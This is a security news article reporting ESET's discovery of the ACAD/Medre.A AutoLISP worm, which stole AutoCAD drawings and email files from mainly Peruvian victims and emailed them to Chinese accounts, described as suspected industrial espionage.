Researchers at ESET have uncovered a new worm that is stealing AutoCAD drawings and designs, and shipping them off to an email account that appears to be in China. Given the hype around Stuxnet and other focused code, the appearance of this worm took ESET researchers by surprise.
The malware itself is written in AutoLISP, the scripting language used by AutoCAD. Over the last two months, the worm – called ACAD/Medre.A – has remained focused on Latin America, most notably Peru.
ESET is reporting an unusually high number of infections (over 10,000), and suggests that this might be explained by the fact that malware disguised as AutoCAD files may have been distributed to companies that were conducting business with public services in Peru.
Researchers say that the malware is targeting versions 14.0 to 19.2 of AutoCAD, and that the author of the worm assumes it will also work in future releases of the software.
“After some configuration, ACAD/Medre.A will begin sending the different AutoCAD drawings that are opened by e-mail to a recipient with an e-mail account at the Chinese 163.com. It will try to do this using 22 other accounts at 163.com and 21 accounts at qq.com, another Chinese internet provider,” explained Righard Zwienenberg, of ESET’s malware research team, on a company blog.
In addition to AutoCAD drawings, the malware also targets PST files (email) and will attempt to copy those as well.
According to Zwienenberg, the malware represents “a serious example of suspected industrial espionage.”
“Every new design created by a victim is sent automatically to the authors of this malware. Needless to say, this can cost the legitimate owner of the intellectual property a lot of money as the cybercriminals will have designs before they even go into production by the original designer. The attacker may even go so far as to get patents on the product before the inventor has registered it at the patent office.”
The email accounts used to store the stolen details were eventually closed, but not before the damage was done. It’s unknown if the code has spread to other areas.
More from Steve Ragan
- Anonymous Claims Attack on IP Surveillance Firm Brickcom, Leaks Customer Data
- Workers Don’t Trust Employers with Personal Data: Survey
- Root SSH Key Compromised in Emergency Alerting Systems
- Morningstar Data Breach Impacted 184,000 Clients
- Microsoft to Patch Seven Flaws in July’s Patch Tuesday
- OpenX Addresses New Security Flaws with Latest Update
- Ubisoft Breached: Users Urged to Change Passwords
- Anonymous Targets Anti-Anonymity B2B Firm Relead.com
Latest News
- Malicious NPM, PyPI Packages Stealing User Information
- VMware Confirms Exploit Code Released for Critical vRealize Logging Vulnerabilities
- 98% of Firms Have a Supply Chain Relationship That Has Been Breached: Analysis
- Dutch, European Hospitals ‘Hit by Pro-Russian Hackers’
- Gem Security Gets $11 Million Seed Investment for Cloud Incident Response Platform
- Ransomware Leads to Nantucket Public Schools Shutdown
- Stop, Collaborate and Listen: Disrupting Cybercrime Networks Requires Private-Public Cooperation and Information Sharing
- Boxx Insurance Raises $14.4 Million in Series B Funding
